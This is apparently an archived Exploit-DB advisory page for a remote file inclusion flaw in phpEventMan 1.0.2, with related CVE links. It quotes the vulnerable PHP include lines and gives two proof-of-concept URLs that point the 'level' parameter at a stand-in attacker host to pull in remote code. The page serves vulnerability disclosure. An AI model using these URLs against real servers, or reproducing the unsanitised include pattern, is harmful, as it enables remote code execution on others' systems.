Lucene search
Mehmet InceEDB-ID:3246HistoryFeb 01, 2007 - 12:00 a.m.
phpEventMan 1.0.2 - 'level' Remote File Inclusion
2007-02-0100:00:00
Mehmet Ince
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
-----------------------------------------------
phpEventMan v1.0.2 (level) Remote File Include Exploit
-----------------------------------------------
Author: Cyber-Security
cyber-security.org
-----------------------------------------------
Code:
include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");
-----------------------------------------------
POC:
www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?
-----------------------------------------------
download: http://sourceforge.net/project/showfiles.php?group_id=169887
-----------------------------------------------
Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594
# milw0rm.com [2007-02-01]Related
prion
prion
Remote file inclusion
2007-02-04 00:28:00
nvd
nvd
CVE-2007-0702
2007-02-04 00:28:00
cve
cve
CVE-2007-0702
2007-02-04 00:28:00
cvelist
cvelist
CVE-2007-0702
2007-02-04 00:00:00
securityvulns
securityvulns